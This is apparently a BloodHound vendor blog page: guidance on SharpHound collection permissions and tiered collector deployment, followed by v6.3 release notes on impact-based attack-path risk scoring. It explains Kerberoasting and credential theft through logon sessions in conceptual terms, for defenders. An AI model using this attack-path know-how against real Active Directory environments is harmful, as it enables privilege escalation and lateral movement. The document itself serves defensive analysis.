Are we positioned to collect the data required to accurately depict objective exposure risks that result in Attack Paths in our environment?
Collection and associated permissions include:
Active Directory Structure Data: Authenticated User group membership
Certificate Services: Authenticated User group membership
Local Group Membership: local Administrator on domain-joined systems
Sessions (logons): local Administrator on domain-joined systems
Domain Controller Registry: Administrator on domain controller(s)
Certificate Authority Registry: Administrator on enterprise CA(s)
The first (AD structure data) is the baseline requirement for BHE functionality; the others provide valuable context for understanding exposure risks that require additional data beyond what can be pulled from a domain controller via LDAP queries. Note that the second, Certificate Services, can be collected with the same basic privileges as AD structure data.
But what does this all mean practically? Depending on what your domain looks like, it could be the difference between seeing 5% exposure and 95% exposure. I often get a lot of pushback on this series of requirements, but this is the tradeoff required for adequate visibility and for accurately mapping the attack paths and inherent risk that come with the relationships and configurations in your AD environment.
If you do not have all of this collection, you’re going to miss some important information:
Where do ADCS attack paths exist that enable domain takeover?
Where do logon sessions exist that facilitate credential theft resulting in privilege escalation or lateral movement?
Where are tiering violations occurring because of bad practices with admins logging into systems at a lower tier?
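One quick way to reason about this tradeoff is to express the permission requirements listed above as a small lookup and check what a given privilege set misses. The labels below are simplified descriptions from this post, not SharpHound configuration values.

```python
# Simplified self-check based on the permission list above; labels are
# descriptive, not SharpHound flags or configuration values.

REQUIRED = {
    "AD structure data":      "authenticated user",
    "Certificate Services":   "authenticated user",
    "Local group membership": "local admin on domain-joined systems",
    "Sessions":               "local admin on domain-joined systems",
    "DC registry":            "admin on domain controllers",
    "CA registry":            "admin on enterprise CAs",
}

def collection_gaps(granted):
    """Return the collections (and thus visibility) lost with these privileges."""
    return sorted(c for c, need in REQUIRED.items() if need not in granted)

# A collector with only baseline rights misses session and registry context:
print(collection_gaps({"authenticated user"}))
```

Running this with only “authenticated user” rights shows exactly the context (sessions, local groups, DC/CA registries) behind the three questions above.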
This leads into a secondary discussion, which is often asked in the form of “How many resources do I need to get this data into BHE?”
In some cases, SharpHound and AzureHound can both be run on the same server. However, it depends on how much is being collected and how you break up the schedule for your collectors. If you have a large environment with 100,000 users and you try collecting both your AD and Azure environments at the same time, you’re probably going to run into some issues.
This next discussion will focus specifically on SharpHound. For proper, hardened SharpHound collection, I recommend as many collectors as you have tiers. I’ll use the standard three-tier model here:
A Tier Zero collector collects everything at the Tier Zero level, which easily accounts for the first requirement, but also allows visibility of all the others (at Tier Zero). You can run your AD structure data, Certificate Services, CA/DC registries, and Tier Zero group and session collection here. This is the primary visibility you want.
A Tier One collector should only need to collect group and session information at Tier One.
A Tier Two collector should only need to collect group and session information at Tier Two.
Here’s a visualization to depict what this might look like:
Tiered SharpHound Deployment
I do recommend following this tiering structure as much as possible, as this scoping of collection can help mitigate unnecessary exposure as a result of cross-tiered collection. While I do see variants of this where SharpHound is either Tier Zero or Tier One and collects from every tier, a tiered collection structure is the safest route forward for collection.
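Sketching the layout above as configuration data makes the scoping explicit. The collector names and collection labels below are descriptive placeholders, not SharpHound CLI options.

```python
# Descriptive sketch of the tiered collector layout above; collector names and
# collection labels are placeholders, not SharpHound CLI options.

TIERED_COLLECTION = {
    "tier0-collector": [
        "AD structure data", "Certificate Services",
        "DC registry", "CA registry",
        "Tier Zero group membership", "Tier Zero sessions",
    ],
    "tier1-collector": ["Tier One group membership", "Tier One sessions"],
    "tier2-collector": ["Tier Two group membership", "Tier Two sessions"],
}

# Sanity check: only the Tier Zero collector touches Tier Zero assets, so
# compromising a lower-tier collector does not grant Tier Zero reach.
for name, scope in TIERED_COLLECTION.items():
    touches_t0 = any("Tier Zero" in item or "registry" in item for item in scope)
    print(name, "touches Tier Zero:", touches_t0)
```

The design point is the same as the diagram: lower-tier collectors never authenticate to higher-tier assets, so their scope (and blast radius) stays within their own tier.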
I also recommend following our hardening guidance for the SharpHound service account, which we list here [1]. This includes using a group managed service account (gMSA) for the SharpHound service account rather than a regular AD user account. Additionally, adding this account to the Protected Users group will limit its exposure to Kerberos delegation and authentication relay attacks.
Whichever path you choose here, understand that the privileges you give to the collector will align with the visibility you have of your environment. If you’re content with only seeing direct permissions based on Access Control Entries (ACEs), AD structure data will be sufficient. But if you want group and session collection, and if you would like to have full visibility of ADCS attack paths — you will need additional collection.
For more information on Data Collection and Permissions, check out our documentation here [2].
And that’s it for now! Come back later for our next topic, which will focus on what to do after you’ve got collection up and running and you’re ready to start working on cleaning things up: Contextualizing Tier Zero.
Just in time for the holidays, sharper tools for faster defense
Today, the SpecterOps team rolled out a number of new features, product enhancements, and recommendations intended to help users of BloodHound Enterprise and BloodHound Community Edition more easily visualize attack paths and show improvements in identity risk reduction over time. Scroll down to learn more about v6.3.0 and related changes to BloodHound Enterprise and BloodHound Community Edition.
BloodHound Enterprise Updates
Report on attack path risk with Revamped Posture page
The BloodHound Enterprise team has completely redesigned the Posture page, delivering several significant enhancements:
Enhanced visibility into resolved attack paths
New metrics to track remediation progress over time
New filter and search capabilities to highlight specific improvements
Consolidated view of relevant data into a single page, reducing unnecessary scrolling
The new Posture page in BloodHound Enterprise provides visibility into resolved attack paths and additional metrics for board-level reporting.
The new Posture page in light mode — this author’s unpopular, but preferred version :)
Improved Analysis Algorithm
This is a massive upgrade to BloodHound Enterprise’s risk analysis capability with a new algorithm we call “Butterfly”:
Enhanced risk scoring with “Impact” analysis
Granular risk measurement per finding for better prioritization
Support for hybrid attack path risk analysis
Let’s get more specific with the first two bullets: enhanced risk scoring and better prioritization.
Enhanced risk scoring with “Impact” analysis
BloodHound Enterprise has historically assessed the risk of attack paths by modeling the principals that can target specific identities and resources:
Starting with v6.3, BloodHound will also incorporate Impact analysis — the principals that can be attacked by a target node:
This new bi-directional risk analysis significantly improves BloodHound Enterprise capabilities in determining severity for attack paths:
The “Butterfly” algorithm, as we call it internally
For example, here is the improved analysis in action with Kerberoastable Users:
A quick refresher on the Kerberoast attack: a Kerberoast attack exploits the Kerberos authentication protocol by targeting service account passwords in a Windows Active Directory environment. An attacker requests Kerberos service tickets for Service Principal Names (SPNs), extracts them, and performs offline password cracking, since the tickets are encrypted with the service account’s NTLM hash. If successful, the attacker gains the plaintext service account credentials, which can be used for lateral movement or privilege escalation.
Anyone can request a service ticket for a Kerberoastable account, which means the exposure is always 100%. The risk of this finding lies in what an attacker could do with the account after a successful crack. Therefore, the risk is determined by the impact: what can be attacked once the attacker has control of the account.
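As a toy illustration of that point (explicitly not BHE’s actual Butterfly scoring), severity for a Kerberoastable finding can be modeled as exposure combined with impact, where exposure is pinned at 100% and impact does all the differentiating:

```python
# Toy illustration only (not BHE's actual Butterfly scoring): for Kerberoastable
# accounts, exposure is pinned at 100%, so impact drives the severity.

def finding_severity(exposure_pct, impact_pct):
    """Placeholder severity: scale impact by exposure (both as percentages)."""
    return exposure_pct * impact_pct / 100

low_impact  = finding_severity(100, 2)   # cracked account with few rights
high_impact = finding_severity(100, 85)  # cracked account with a path to Tier Zero
print(low_impact, high_impact)
```

With exposure held constant at 100%, the two findings differ only by what the cracked account can reach, which is exactly why impact analysis changes the prioritization here.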
Granular risk measurement per finding for better prioritization
BloodHound Enterprise delivers better prioritization by analyzing risk per finding with v6.3. Historically, risk was calculated per attack path type:
BHE v6.2 (previous version) with no granular risk measurements per finding.
Now, BloodHound Enterprise will assess the risk of every finding, allowing you to pinpoint where to start first:
BHE v6.3 (new version) with enhanced risk analysis and granularity at the finding level
In the example above, one particular login is more risky than the others and should be prioritized. BloodHound Enterprise is simplifying the analysis for you to enable better prioritization. In this case, APP4.TITANCORP.LOCAL is prioritized above the rest as DOMAIN USERS has the ability to RDP into the host and capture the user session:
100% of users with access to a computer with a user session from SVCINTRUST (a Tier Zero account)
This granularity is on every finding. Let’s look again at a large list of Kerberoastable users. Thanks to this improvement, we now know where to prioritize our efforts:
BloodHound Enterprise prioritizing Kerberoastable users for remediation based on Impact
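In effect, per-finding scores reduce prioritization to a simple sort. APP4.TITANCORP.LOCAL comes from the example above; the other hostnames and all of the scores below are invented for illustration.

```python
# Made-up finding scores to show the idea: granular per-finding risk turns
# prioritization into a sort (only APP4 appears in the example above).

findings = [
    {"principal": "APP2.TITANCORP.LOCAL", "risk": 31},
    {"principal": "APP4.TITANCORP.LOCAL", "risk": 94},
    {"principal": "APP7.TITANCORP.LOCAL", "risk": 12},
]

# Highest-risk finding first: remediate APP4 before the rest.
for f in sorted(findings, key=lambda f: f["risk"], reverse=True):
    print(f["principal"], f["risk"])
```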
BloodHound Common Updates
All enhancements listed below are available to both BloodHound Community and BloodHound Enterprise users.
Node/Edge Label Toggle makes for more flexible public reporting
A long-requested feature has returned to BHCE and is also available in BHE, allowing users to show or hide sensitive node and edge labels directly in the UI. This was contributed by community member @palt, to whom we give major kudos!
The Node/Edge label toggle has returned due to popular demand. This feature allows users to show or hide sensitive node and edge labels directly in the UI.
New CoerceToTGT Edge Type
This new edge type provides more visibility into unconstrained delegation scenarios:
Indicates principals configured for potential ticket-granting ticket (TGT) coercion
For Enterprise users, this consolidates previous “Unconstrained Delegation” findings into a single, more informative attack path finding
The new CoerceToTGT Edge Type provides additional visibility into unconstrained delegation scenarios.
BloodHound Enterprise automatically identifying the new CoerceToTGT / Unconstrained Delegation Attack Paths
Single Sign On (SSO) Improvements
Added OpenID Connect (OIDC) support alongside existing SAMLv2 providers
Automatic redirection for environments with a single SSO provider
Enterprise Domain Controllers Group Improvement
Improved consistency when creating an Enterprise Domain Controllers group to reduce confusion depending on how a collection was performed (note: requires a SharpHound upgrade).
Minor Improvements and Bug Fixes
The release also includes several quality-of-life improvements:
Fixed scrolling issues in entity panels
Resolved file upload hanging problems
Corrected a pre-saved Cypher query for “Kerberoastable users with most privileges”
Improved error handling in SharpHound data collection
Recommendations, Early Access and Further Information
Upgrade Recommendations:
Upgrade to SharpHound v2.5.12 (Enterprise) or v2.5.9 (Community Edition)
Upgrade AzureHound to v2.2.1 for performance improvements
Early Access Features
Administrators can enable the new analysis algorithm from the Administration -> Early Access configuration screen
To learn more about this release, sign up and join us for BloodHound Live: Monthly Release Recap on December 18 — and bring your questions! All BloodHound users can find expanded details on these updates today in our release notes or by contacting their Technical Account Manager.